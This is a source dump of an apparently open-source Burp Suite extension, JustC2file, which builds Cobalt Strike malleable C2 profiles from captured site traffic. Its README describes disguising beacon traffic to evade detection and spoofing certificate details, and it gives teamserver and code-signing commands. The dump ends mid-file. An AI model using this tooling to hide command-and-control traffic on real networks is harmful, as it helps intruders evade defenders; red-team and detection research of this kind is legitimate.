├── .gitignore ├── README.md ├── imgs ├── check_http.png ├── http-get.jpg ├── http-post.png └── text-bing.png ├── pom.xml ├── src └── main │ ├── java │ ├── burp │ │ └── BurpExtender.java │ └── com │ │ └── test │ │ └── burp │ │ ├── Generator.java │ │ ├── JustC2file.java │ │ ├── dao │ │ ├── DnsBeaconDao.java │ │ ├── HttpGetBeaconDao.java │ │ ├── HttpPostBeaconDao.java │ │ ├── HttpStagerDao.java │ │ ├── HttpsCertificateDao.java │ │ ├── PersiancatDao.java │ │ ├── PostExDao.java │ │ └── impl │ │ │ ├── AnalyzeInfo.java │ │ │ ├── DnsBeaconDaoImpl.java │ │ │ ├── HttpGetBeaconDaoImpl.java │ │ │ ├── HttpPostBeaconDaoImpl.java │ │ │ ├── HttpStagerDaoImpl.java │ │ │ ├── HttpsCertificateDaoImpl.java │ │ │ ├── LoadFile.java │ │ │ ├── PersiancatDaoImpl.java │ │ │ └── PostExDaoImpl.java │ │ ├── model │ │ ├── DnsBeacon.java │ │ ├── HttpGetBeacon.java │ │ ├── HttpPostBeacon.java │ │ ├── HttpStager.java │ │ ├── HttpsCertificate.java │ │ ├── Persiancat.java │ │ └── PostEx.java │ │ ├── service │ │ ├── DnsBeaconService.java │ │ ├── HttpGetBeaconService.java │ │ ├── HttpPostBeaconService.java │ │ ├── HttpStagerService.java │ │ ├── HttpsCertificateService.java │ │ ├── PersiancatService.java │ │ ├── PostExService.java │ │ └── impl │ │ │ ├── DnsBeaconServiceImpl.java │ │ │ ├── HttpGetBeaconServiceImpl.java │ │ │ ├── HttpPostBeaconServiceImpl.java │ │ │ ├── HttpStagerServiceImpl.java │ │ │ ├── HttpsCertificateServiceImpl.java │ │ │ ├── PersiancatServiceImpl.java │ │ │ └── PostExServiceImpl.java │ │ ├── testcode │ │ └── FreemarkerDemo.java │ │ └── ui │ │ └── C2ui.java │ └── resources │ ├── templates │ ├── c2profile_template.ftl │ ├── c2profile_template4.2.ftl │ └── c2profile_template4.4.ftl │ └── wordlists │ ├── dns_idle │ ├── dns_stager_prepend │ ├── dns_stager_subhost │ ├── parameters │ ├── pipename │ ├── spawnto │ ├── stager_uri │ └── useragents └── test.profile /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/ 2 | .DS_Store/ -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # JustC2file: Burp插件--C2 profile生成器 2 | ## 描述 3 | 4 | 可以通过Burp代理选中请求,生成Cobalt Strike的profile文件 5 | 6 | ## 使用 7 | 8 | 在Burp中安装插件之后,同时选中目标站点至少三条GET/POST请求,且必须同时存在GET/POST;将通过这三个请求响应的数据包生成profile文件,然后复制文本到Cobalt Strike服务器上,使用c2lint进行检测,通过之后可使用该文件启动CS,以达到规避流量检测的效果;测试可以执行命令再用于实际环境中。 9 | 10 | ![](https://github.com/Peithon/JustC2file/blob/master/imgs/text-bing.png) 11 | 12 | ## 演示 13 | 14 | ### 1、浏览器无痕页面产生流量 15 | 16 | 在浏览器中开启无痕模式(防止存在个人信息),然后开启代理,在无痕模式下产生流量;chrome在无痕模式下默认不开启扩展程序,如果没有开启的话:点击右上角菜单图标【三个点】,依次选择【更多工具】-【扩展程序】- 详情,开启。 17 | 18 | 19 | ### 2、Burp中选中相关流量 20 | 21 | 回到Burp中,将想用的流量右键高亮显示,找到足够多的流量时同时选中,右键生成CS的配置文件 22 | 23 | ![](https://github.com/Peithon/JustC2file/blob/master/imgs/check_http.png) 24 | 25 | ### 3、修改配置文件 26 | 27 | ***修改https-certificate*** 28 | 29 | 可以不使用默认的配置参数值,利用目标站点的证书信息生成证书,可信度会更高一些。 30 | 31 | ``` 32 | #默认配置,validity为证书有效期 33 | https-certificate { 34 | 35 | set C "SI"; 36 | set CN "www.bing.com"; 37 | set O "bing.com"; 38 | set OU "bing.com"; 39 | set validity "365"; 40 | } 41 | ``` 42 | 43 | ***修改code-signer*** 44 | 45 | 如果需要文件签名,修改成你的证书名称和证书密码,并去除注释 46 | 47 | ``` 48 | #code-signer{ 49 | # set keystore "keystore.jks"; 50 | # set password "123456"; 51 | # set alias "google"; 52 | #} 53 | ``` 54 | ### 4、使用生成的文件在服务器上启动CS 55 | 56 | 在服务器使用c2lint测试文件,没有错误后启动CS,使用命令 57 | 58 | ``` 59 | nohup ./teamserver [external IP] [password] [/path/to/my.profile] & 60 | ``` 61 | 62 | 生成可执行文件,然后在目标上执行,如果执行命令存在结果回显,说明配置文件可以正常使用。下面是在`Wireshark`中捕获的`Cobalt Strike`流量,[示例文本](https://github.com/Peithon/JustC2file/blob/master/test.profile),图片被压缩了比较糊: 63 | 64 | ![](https://github.com/Peithon/JustC2file/blob/master/imgs/http-get.jpg) 65 | 66 | ![](https://github.com/Peithon/JustC2file/blob/master/imgs/http-post.png) 67 | 68 | ## 启动CS前的注意事项 69 | ### 关于https-certificate 70 | 71 | 可以不使用默认的配置参数值,利用目标站点的证书信息生成证书,可信度会更高一些。 72 | 73 | ``` 74 | #默认配置,validity为证书有效期 75 | https-certificate { 76 | 77 | set C "SI"; 78 | set CN "www.bing.com"; 79 | set O "bing.com"; 80 | set OU "bing.com"; 81 | set validity "365"; 82 | } 83 | ``` 84 | 85 | 在浏览器查看目标站点相关的证书信息,然后填充到https-certificate中的对应的配置参数中。 86 | 87 | 88 | ### 关于code-signer 89 | 90 | 在`Attacks -> Packages -> Windows Executable和Windows Executable (S)`生成可执行文件或DLL文件时,默认是不进行签名的,如果需要对可执行文件或 DLL 文件进行签名,要在CS服务器上生成`jks`证书,然后在profile文件中配置code-signer,步骤如下: 91 | 92 | ***C2profile与keystore证书最好在相同目录下*** 93 | 94 | 1、利用`keytool`生成自己的免费证书 95 | 96 | 注意,记住`-alias`后面的参数和`-keystore`后面的参数后面会在`C2-profile`文件中使用。 97 | ``` 98 | keytool -genkey -alias google -keyalg RSA -validity 36500 -keystore keystore.store 99 | ``` 100 | 2、将store证书转成`.p12`格式 101 | 102 | 这里原来的`keystore.store`证书会重命名为`keystore.store.old` 103 | ``` 104 | keytool -importkeystore -srckeystore keystore.store -destkeystore keystore.store -deststoretype pkcs12 105 | ``` 106 | 3、将`.p12`格式证书转为`.jks`格式证书 107 | ``` 108 | keytool -v -importkeystore -srckeystore keystore.store -srcstoretype PKCS12 -destkeystore keystore.jks -deststoretype JKS 109 | ``` 110 | 4、C2文件中配置 111 | 112 | ``` 113 | # 修改成你的证书名称和证书密码,并去除注释 114 | #code-signer{ 115 | # set keystore "keystore.jks"; 116 | # set password "123456"; 117 | # set alias "google"; 118 | #} 119 | ``` 120 | ## 更新日志 121 | - 2022-01-15 第一个正式版本补充 122 | - 添加支持cs4.4版本 123 | 124 | - 2022-01-14 更新第一个正式版本 125 | - 将测试版本的代码重构 126 | - 采用mvc模式重新构建代码 127 | - 支持cs4.2 128 | - 支持`http-stager`通过流量获取 129 | - 新增`prepend`、`append`通过流量自动生成 130 | - 支持`post-ex`模块随机生成 131 | - 新增`process-inject`定义 132 | 133 | - 2021-12-28 第一个测试版本,支持`http-get`、`http-post`通过选取的流量生成,其他的都是随机产生。 134 | 135 | ## 参考文献 136 | 137 | [CS官方文档](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/malleable-c2_main.htm?cshid=1062) 138 | 139 | [Randomized Malleable C2 Profiles Made Easy](https://bluescreenofjeff.com/2017-08-30-randomized-malleable-c2-profiles-made-easy/) 140 | 141 | [How to Write Malleable C2 Profiles for Cobalt Strike](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) 142 | 143 | [threatexpress/malleable-c2](https://github.com/threatexpress/malleable-c2) 144 | 145 | 146 | -------------------------------------------------------------------------------- /imgs/check_http.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Peithon/JustC2file/7b14ee267808f60739cbc377354645a9aa378f18/imgs/check_http.png -------------------------------------------------------------------------------- /imgs/http-get.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Peithon/JustC2file/7b14ee267808f60739cbc377354645a9aa378f18/imgs/http-get.jpg -------------------------------------------------------------------------------- /imgs/http-post.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Peithon/JustC2file/7b14ee267808f60739cbc377354645a9aa378f18/imgs/http-post.png -------------------------------------------------------------------------------- /imgs/text-bing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Peithon/JustC2file/7b14ee267808f60739cbc377354645a9aa378f18/imgs/text-bing.png -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | com.test.burp 8 | JustC2file 9 | 1.0 10 | jar 11 | 12 | 13 | 14 | net.portswigger.burp.extender 15 | burp-extender-api 16 | 2.1 17 | 18 | 19 | 20 | org.freemarker 21 | freemarker 22 | 2.3.20 23 | 24 | 25 | 26 | commons-io 27 | commons-io 28 | 2.11.0 29 | 30 | 31 | 32 | org.apache.maven.plugins 33 | maven-install-plugin 34 | 2.4 35 | 36 | 37 | 38 | 39 | 40 | 41 | maven-compiler-plugin 42 | 3.7.0 43 | 44 | 1.8 45 | 1.8 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /src/main/java/burp/BurpExtender.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | import com.test.burp.JustC2file; 4 | 5 | public class BurpExtender extends JustC2file { 6 | //@author: peithon 7 | public static void main(String[] args) { 8 | //File->Project Structure->Artifacts->Add->Jar->From modules with dependencies 9 | } 10 | } -------------------------------------------------------------------------------- /src/main/java/com/test/burp/Generator.java: -------------------------------------------------------------------------------- 1 | package com.test.burp; 2 | 3 | import burp.*; 4 | import com.test.burp.dao.impl.AnalyzeInfo; 5 | import com.test.burp.service.*; 6 | import com.test.burp.service.impl.*; 7 | import freemarker.template.Configuration; 8 | import freemarker.template.Template; 9 | 10 | import java.io.PrintWriter; 11 | import java.io.StringWriter; 12 | import java.util.*; 13 | 14 | /** 15 | * @program: JustC2file 16 | * @author: Peithon 17 | * @create: 2022-01-08 09:09 18 | **/ 19 | public class Generator { 20 | private PersiancatService persiancatService = new PersiancatServiceImpl(); 21 | private HttpsCertificateService httpsCertificateService = new HttpsCertificateServiceImpl(); 22 | private PostExService postExService = new PostExServiceImpl(); 23 | private HttpStagerService httpStagerService = new HttpStagerServiceImpl(); 24 | private HttpGetBeaconService httpGetBeaconService = new HttpGetBeaconServiceImpl(); 25 | private HttpPostBeaconService httpPostBeaconService = new HttpPostBeaconServiceImpl(); 26 | private DnsBeaconService dnsBeaconService = new DnsBeaconServiceImpl(); 27 | private AnalyzeInfo analyzeInfo = new AnalyzeInfo(); 28 | private IContextMenuInvocation invocation; 29 | private IExtensionHelpers helpers; 30 | private IBurpExtenderCallbacks callbacks; 31 | private String example; 32 | 33 | public Generator(IContextMenuInvocation invocation, IBurpExtenderCallbacks callbacks) { 34 | this.invocation = invocation; 35 | this.helpers = callbacks.getHelpers(); 36 | this.callbacks = callbacks; 37 | } 38 | 39 | public String getProfile(String TEMPLATE_VERSION){ 40 | Map dataMap = new HashMap(); 41 | // getSelectedMessages()函数用于获取当前显示的或用户选中的HTTP请求/响应的细节 42 | // analyzeRequest()函数用于分析HTTP请求信息以便获取到多个键的值 43 | dataMap.putAll(persiancatService.putdataPersiancat()); 44 | dataMap.putAll(postExService.putdataPostEx()); 45 | dataMap.putAll(httpsCertificateService.putdataHttpsCertificate()); 46 | IHttpRequestResponse[] messages = invocation.getSelectedMessages(); 47 | IHttpRequestResponse stagermessages = getHttpStager(messages); 48 | httpStagerService.dataHttpStager(callbacks,stagermessages); 49 | PrintWriter stderr = new PrintWriter(callbacks.getStderr(), true); 50 | for (IHttpRequestResponse message : messages) { 51 | stderr.println("IHttpRequestResponse message: "+message); 52 | IRequestInfo analyzedRequest = helpers.analyzeRequest(message.getRequest()); 53 | if(!message.equals(stagermessages)) { 54 | if (analyzedRequest.getMethod().equals("POST")) { 55 | httpPostBeaconService.dataHttpPostBeacon(callbacks,message); 56 | } else if (analyzedRequest.getMethod().equals("GET")) { 57 | httpGetBeaconService.dataHttpGetBeacon(callbacks,message); 58 | } 59 | } 60 | } 61 | stderr.println("[end-message] ------------------------------------------------------------------------"); 62 | dataMap.putAll(httpStagerService.putdataHttpStager()); 63 | dataMap.putAll(httpGetBeaconService.putdataHttpGetBeacon()); 64 | dataMap.putAll(httpPostBeaconService.putdataHttpPostBeacon()); 65 | dataMap.putAll(dnsBeaconService.putdataDnsBeacon()); 66 | if(TEMPLATE_VERSION.equals("CobaltStrike_4_4")){ 67 | return getExampleFile(dataMap,"c2profile_template4.4.ftl"); 68 | } 69 | return getExampleFile(dataMap,"c2profile_template4.2.ftl"); 70 | } 71 | 72 | public String getExampleFile(Map dataMap,String TEMPLATE_FILENAME){ 73 | try { 74 | // step1 创建freeMarker配置实例 75 | Configuration cfg = new Configuration(); 76 | // step2 获取模版路径 77 | cfg.setClassForTemplateLoading(this.getClass(),"/templates"); 78 | // step3 创建数据模型 79 | //Map dataMap = new HashMap(); 80 | // step4 加载模版文件 81 | Template template = cfg.getTemplate(TEMPLATE_FILENAME); 82 | // step5 生成数据 83 | StringWriter strWriter = new StringWriter(); 84 | template.process(dataMap, strWriter); 85 | example = strWriter.toString(); 86 | } catch (Exception e) { 87 | e.printStackTrace(); 88 | } 89 | return example; 90 | } 91 | 92 | public IHttpRequestResponse getHttpStager(IHttpRequestResponse[] messages){ 93 | List getlist = new ArrayList<>(); 94 | List postlist = new ArrayList<>(); 95 | IHttpRequestResponse returnIHttp = null; 96 | for (IHttpRequestResponse message : messages) { 97 | IRequestInfo analyzedRequest = helpers.analyzeRequest(message.getRequest()); 98 | if (analyzedRequest.getMethod().equals("POST")) { 99 | postlist.add(message); 100 | } else if (analyzedRequest.getMethod().equals("GET")) { 101 | getlist.add(message); 102 | } 103 | } 104 | if (getlist.size() >= postlist.size()){ 105 | for (IHttpRequestResponse iHttpRequestResponse : getlist) { 106 | if (analyzeInfo.isExistResponseBody(callbacks, iHttpRequestResponse)) { 107 | returnIHttp = iHttpRequestResponse; 108 | break; 109 | } 110 | } 111 | if(returnIHttp == null){ 112 | returnIHttp = getlist.get(new Random().nextInt(getlist.size())); 113 | } 114 | }else { 115 | for (IHttpRequestResponse iHttpRequestResponse : postlist) { 116 | if (analyzeInfo.isExistResponseBody(callbacks, iHttpRequestResponse)) { 117 | returnIHttp = iHttpRequestResponse; 118 | break; 119 | } 120 | } 121 | if(returnIHttp == null){ 122 | returnIHttp = postlist.get(new Random().nextInt(postlist.size())); 123 | } 124 | } 125 | return returnIHttp; 126 | } 127 | } 128 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/JustC2file.java: -------------------------------------------------------------------------------- 1 | package com.test.burp; 2 | 3 | import burp.*; 4 | import com.test.burp.ui.C2ui; 5 | 6 | import javax.swing.*; 7 | import java.io.PrintWriter; 8 | import java.util.ArrayList; 9 | import java.util.List; 10 | /** 11 | * @program: JustC2file 12 | * @author: Peithon 13 | * @create: 2022-01-08 09:09 14 | **/ 15 | public class JustC2file implements IBurpExtender, IContextMenuFactory 16 | { 17 | private static final String name = "JustC2file"; 18 | private IBurpExtenderCallbacks callbacks; 19 | 20 | @Override 21 | public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) 22 | { 23 | PrintWriter stdout = new PrintWriter(callbacks.getStdout(), true); 24 | PrintWriter stderr = new PrintWriter(callbacks.getStderr(), true); 25 | this.callbacks = callbacks; 26 | callbacks.setExtensionName(name); 27 | stdout.println("[INFO] ------------------------------------------------------------------------\n" + 28 | "[INFO] C2 profile generator\n" + 29 | "[INFO] ------------------------------------------------------------------------\n" + 30 | "[INFO] 用法: 同时选中至少三个请求(GET/POST),且必须GET和POST同时存在,然后右键点击该插件。\n" + 31 | "[INFO] 提示: 想要隐蔽性好的话,Get请求可以选择JQuery;\n" + 32 | "[INFO] ------------------------------------------------------------------------\n"); 33 | stderr.println("no errors"); 34 | callbacks.registerContextMenuFactory(this); 35 | 36 | } 37 | //自定义上下文菜单 38 | @Override 39 | public List createMenuItems(final IContextMenuInvocation invocation) { 40 | List listMenuItems = new ArrayList(); 41 | //子菜单 42 | JMenuItem menuItem42 = new JMenuItem("CobaltStrike 4.2"); 43 | JMenuItem menuItem44 = new JMenuItem("CobaltStrike 4.4"); 44 | //父级菜单 45 | JMenu jMenu = new JMenu("Generate C2 profile"); 46 | jMenu.add(menuItem42); 47 | jMenu.add(menuItem44); 48 | listMenuItems.add(jMenu); 49 | menuItem42.addActionListener(e -> { 50 | // 生成C2 profile的GUI框 51 | C2ui frame = new C2ui(); 52 | frame.setLocationRelativeTo(null); 53 | frame.setVisible(true); 54 | frame.setFile(new Generator(invocation,this.callbacks).getProfile("CobaltStrike_4_2")); 55 | }); 56 | 57 | menuItem44.addActionListener(e -> { 58 | // 生成C2 profile的GUI框 59 | C2ui frame = new C2ui(); 60 | frame.setLocationRelativeTo(null); 61 | frame.setVisible(true); 62 | frame.setFile(new Generator(invocation,this.callbacks).getProfile("CobaltStrike_4_4")); 63 | }); 64 | 65 | return listMenuItems; 66 | } 67 | 68 | 69 | } -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/DnsBeaconDao.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao; 2 | 3 | import com.test.burp.model.DnsBeacon; 4 | 5 | import java.util.Map; 6 | 7 | public interface DnsBeaconDao { 8 | DnsBeacon dataDnsBeacon(); 9 | Map putdataDnsBeacon(); 10 | } 11 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/HttpGetBeaconDao.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import com.test.burp.model.HttpGetBeacon; 6 | 7 | import java.util.Map; 8 | /** 9 | * @program: JustC2file 10 | * @author: Peithon 11 | * @create: 2022-01-08 09:09 12 | **/ 13 | public interface HttpGetBeaconDao { 14 | HttpGetBeacon dataHttpGetBeacon(IBurpExtenderCallbacks callbacks,IHttpRequestResponse message); 15 | Map putdataHttpGetBeacon(); 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/HttpPostBeaconDao.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import com.test.burp.model.HttpPostBeacon; 6 | 7 | import java.util.Map; 8 | 9 | public interface HttpPostBeaconDao { 10 | HttpPostBeacon dataHttpPostBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message); 11 | Map putdataHttpPostBeacon(); 12 | } 13 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/HttpStagerDao.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import com.test.burp.model.HttpStager; 6 | 7 | import java.util.Map; 8 | 9 | public interface HttpStagerDao { 10 | HttpStager dataHttpStager(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message); 11 | Map putdataHttpStager(); 12 | } 13 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/HttpsCertificateDao.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao; 2 | 3 | import com.test.burp.model.HttpsCertificate; 4 | 5 | import java.util.Map; 6 | /** 7 | * @program: JustC2file 8 | * @author: Peithon 9 | * @create: 2022-01-08 09:09 10 | **/ 11 | public interface HttpsCertificateDao { 12 | HttpsCertificate dataHttpsCertificate(); 13 | Map putdataHttpsCertificate(); 14 | } 15 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/PersiancatDao.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao; 2 | 3 | import com.test.burp.model.Persiancat; 4 | 5 | import java.util.Map; 6 | /** 7 | * @program: JustC2file 8 | * @author: Peithon 9 | * @create: 2022-01-08 09:09 10 | **/ 11 | public interface PersiancatDao { 12 | Persiancat dataPersiancat(); 13 | Map putdataPersiancat(); 14 | } 15 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/PostExDao.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao; 2 | 3 | import com.test.burp.model.PostEx; 4 | 5 | import java.util.Map; 6 | /** 7 | * @program: JustC2file 8 | * @author: Peithon 9 | * @create: 2022-01-08 09:09 10 | **/ 11 | public interface PostExDao { 12 | PostEx dataPostEx(); 13 | Map putdataPostEx(); 14 | } 15 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/AnalyzeInfo.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import burp.IResponseInfo; 6 | 7 | import java.nio.ByteBuffer; 8 | import java.nio.charset.Charset; 9 | import java.nio.charset.StandardCharsets; 10 | import java.util.*; 11 | import java.util.regex.Matcher; 12 | import java.util.regex.Pattern; 13 | import java.util.stream.Collectors; 14 | 15 | import static java.util.Arrays.asList; 16 | /** 17 | * @program: JustC2file 18 | * @author: Peithon 19 | * @create: 2022-01-08 09:09 20 | **/ 21 | public class AnalyzeInfo { 22 | //处理GET/POST的Requset/Response 23 | public Map lookHeaders(List headers){ 24 | Map dataMap = new HashMap(); 25 | for (String header : headers) { 26 | if (header.startsWith("GET")) { 27 | //System.out.println("剔除 GET 请求行"); 28 | }else if(header.startsWith("POST")){ 29 | //System.out.println("剔除 POST 请求行"); 30 | }else if(header.startsWith("User-Agent")){ 31 | //System.out.println("剔除 User-Agent 头"); 32 | }else if(header.startsWith("Cookie")){ 33 | //System.out.println("剔除 Cookie 头"); 34 | }else if(header.startsWith("HTTP")){ 35 | //System.out.println("剔除 HTTP 响应行"); 36 | }else if (header.startsWith("Set-Cookie")){ 37 | //System.out.println("剔除 Set-Cookie 头"); 38 | }else if(header.startsWith("Content-Type")){ 39 | //System.out.println("默认存在"); 40 | }else if(header.startsWith("Server")){ 41 | //System.out.println("默认存在"); 42 | }else if(header.startsWith("Date" ) || header.startsWith("Content-Length")) { 43 | //System.out.println("不配置,在http-config中补充"); 44 | }else if(header.startsWith("Accept-Encoding")){ 45 | //System.out.println("GET中 默认存在,"); 46 | }else if(header.startsWith("Host")){ 47 | //System.out.println("剔除 Host 头"); 48 | }else if (header.startsWith("Accept-Language")){ 49 | //通过逗号分割来携带多国语言。第一个会是首选的语言,其它语言会携带一个“q”值,来表示用户对该语言的喜好程度(0~1) 50 | //zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 51 | //System.out.println("剔除 Accept-Language 头,需要的话自己添加或者后期代码更新做替换处理"); 52 | }else if(header.startsWith("sec-") || header.startsWith("Sec-") || header.startsWith("DNT:")){ 53 | //sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" 54 | //DNT: 1 55 | //sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-site 56 | //Sec-Fetch-Mode: cors 57 | //Sec-Fetch-Dest: empty 58 | }else { 59 | List lists = Arrays.asList(header.split("[:]\\s+")); 60 | StringBuilder line = new StringBuilder(); 61 | String key =""; 62 | for (int i = 0; i < lists.size(); i++){ 63 | if (i == 0){ 64 | key = lists.get(0); 65 | }else{ 66 | line.append(lists.get(i)); 67 | } 68 | } 69 | if(key.equals("") && line.toString().equals("")){ 70 | // System.out.println(""); 71 | }else { 72 | dataMap.put(key, line.toString().trim().replaceAll("\"","\\\\\"")); 73 | } 74 | } 75 | } 76 | return dataMap; 77 | } 78 | 79 | //设置编码类型 80 | public String getEncode(){ 81 | List encode = asList( 82 | "netbiosu;", 83 | "base64;", 84 | "base64url;", 85 | "mask;", 86 | "netbios;" 87 | ); 88 | return encode.get(new Random().nextInt(encode.size())); 89 | } 90 | 91 | //格式化header头 92 | public List formatHeaders(Map map){ 93 | List listall = new ArrayList<>(map.keySet()); 94 | List list = new ArrayList<>(); 95 | if (listall.size() > 3){ 96 | for (int j= 0 ; j < listall.size()/3+1 ; j++){ 97 | list.add(listall.get(new Random().nextInt(listall.size()))); 98 | } 99 | list = list.stream().distinct().collect(Collectors.toList()); 100 | }else{ 101 | list.addAll(listall); 102 | } 103 | List line = new ArrayList<>(); 104 | for (int i = 0; i< 4;i++){ 105 | line.add(i,""); 106 | } 107 | for (int i = 0 ; i < list.size() ; i++){ 108 | if(i == 4){ 109 | break; 110 | } 111 | line.set(i,"header \""+list.get(i)+"\" \""+map.get(list.get(i))+"\";"); 112 | } 113 | return line; 114 | } 115 | //格式化uri 116 | public String formatUri(String uri) { 117 | List list = asList(uri.split("/")); 118 | StringBuilder uriStr = new StringBuilder(); 119 | if (list.size() <= 7) { 120 | uriStr = new StringBuilder(uri); 121 | } else { 122 | for (int i = 1; i < 7; i++) { 123 | uriStr.append("/").append(list.get(i)); 124 | } 125 | } 126 | return uriStr.toString(); 127 | } 128 | 129 | //格式化body 130 | public String formatHtml(String body){ 131 | body =body.replaceAll("",""); 132 | body = decodeUnicode(body); 133 | body = body.replaceAll("[\u4e00-\u9fa5]","docs"); 134 | //str = str.replaceAll("/[*](.|[\r\n])*?[*]/",""); 135 | body = body.replaceAll("\t|\r|\n",""); 136 | // str = str.replaceAll("\\\\","\\\\\\\\"); 137 | return body; 138 | } 139 | public String lookHost(List headers){ 140 | String host = ""; 141 | for (String header : headers) { 142 | if (header.startsWith("Host")) { 143 | host = header.split("[:]\\s+")[1].trim(); 144 | } 145 | } 146 | return host; 147 | } 148 | 149 | public String lookServer(List headers){ 150 | String server = "Apache"; 151 | for (String header : headers) { 152 | if (header.startsWith("Server:")) { 153 | server = header.split("[:]\\s+")[1].trim(); 154 | } 155 | } 156 | return server; 157 | } 158 | 159 | public String lookContentType(List headers){ 160 | String contentType = "text/plain;charset=UTF-8"; 161 | for (String header : headers) { 162 | if (header.startsWith("Content-Type")) { 163 | contentType = header.split("[:]\\s+")[1].trim(); 164 | } 165 | } 166 | return contentType; 167 | } 168 | 169 | //判断响应中的是否存在body 170 | public Boolean isExistResponseBody(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message){ 171 | IResponseInfo analyzeResponse = callbacks.getHelpers().analyzeResponse(message.getResponse()); 172 | //响应包是没有参数的概念的,大多需要修改的内容都在body中 173 | String resp = new String(message.getResponse()); 174 | int bodyOffset = analyzeResponse.getBodyOffset(); 175 | //获取响应的 MIME 类型,如 HTTP 标头中所述。 176 | //String sss = analyzeResponse.getStatedMimeType(); 177 | //获取响应的 MIME 类型,从 HTTP 消息正文的内容推断 178 | //String ssst = analyzeResponse.getInferredMimeType(); 179 | String body = resp.substring(bodyOffset); 180 | //如果body中不存在内容,返回false 181 | return !body.equals(""); 182 | } 183 | 184 | //处理响应中的body存在"的情况,并返回三部分供调用 185 | public List analyzeBody(String body){ 186 | body = formatHtml(body); 187 | List list = new ArrayList<>(); 188 | if(body.length() < 4211){ 189 | list.add(moBody(body.substring(0,body.length()/3))); 190 | list.add(moBody(body.substring(body.length()/3,body.length()/3*2))); 191 | list.add(moBody(body.substring(body.length()/3*2,body.length()))); 192 | }else{ 193 | int length1 = new Random().nextInt(600)+1506; 194 | int length2 = body.length()- length1; 195 | int len = (length1+length2)/2+new Random().nextInt(335)+577; 196 | list.add(moBody(body.substring(0,length1))); 197 | list.add(moBody(body.substring((length1+length2)/2,len))); 198 | list.add(moBody(body.substring(length2,body.length()))); 199 | } 200 | return list; 201 | } 202 | 203 | //特殊字符处理 204 | public String moBody(String body){ 205 | body = body.replaceAll("\\\\","\\\\\\\\"); 206 | body = body.replaceAll("\"","\\\\\""); 207 | return body; 208 | } 209 | 210 | // 将网页中的unicode转UTF-8 211 | public String decodeUnicode(String str) { 212 | Charset set = StandardCharsets.UTF_16; 213 | Pattern p = Pattern.compile("\\\\u([0-9a-fA-F]{4})"); 214 | Matcher m = p.matcher(str); 215 | int start = 0; 216 | int start2 = 0; 217 | StringBuilder sb = new StringBuilder(); 218 | while (m.find(start)) { 219 | start2 = m.start(); 220 | if (start2 > start) { 221 | String seg = str.substring(start, start2); 222 | sb.append(seg); 223 | } 224 | String code = m.group(1); 225 | int i = Integer.valueOf(code, 16); 226 | byte[] bb = new byte[4]; 227 | bb[0] = (byte) ((i >> 8) & 0xFF); 228 | bb[1] = (byte) (i & 0xFF); 229 | ByteBuffer b = ByteBuffer.wrap(bb); 230 | sb.append(String.valueOf(set.decode(b)).trim()); 231 | start = m.end(); 232 | } 233 | start2 = str.length(); 234 | if (start2 > start) { 235 | String seg = str.substring(start, start2); 236 | sb.append(seg); 237 | } 238 | return sb.toString(); 239 | } 240 | 241 | } 242 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/DnsBeaconDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import com.test.burp.dao.DnsBeaconDao; 4 | import com.test.burp.model.DnsBeacon; 5 | 6 | import java.io.IOException; 7 | import java.util.HashMap; 8 | import java.util.Map; 9 | import java.util.Random; 10 | 11 | /** 12 | * @program: JustC2file 13 | * @author: Peithon 14 | * @github: https://github.com/Peithon/JustC2file 15 | * @create: 2022-01-13 16:03 16 | **/ 17 | public class DnsBeaconDaoImpl implements DnsBeaconDao { 18 | private DnsBeacon dnsBeacon = new DnsBeacon(); 19 | private LoadFile file = new LoadFile(); 20 | Map dataMap = new HashMap(); 21 | @Override 22 | public DnsBeacon dataDnsBeacon() { 23 | dnsBeacon.setMaxdns(lookMaxdns()); 24 | dnsBeacon.setDns_max_txt(lookDns_max_txt()); 25 | dnsBeacon.setDns_sleep(lookDns_sleep()); 26 | try { 27 | 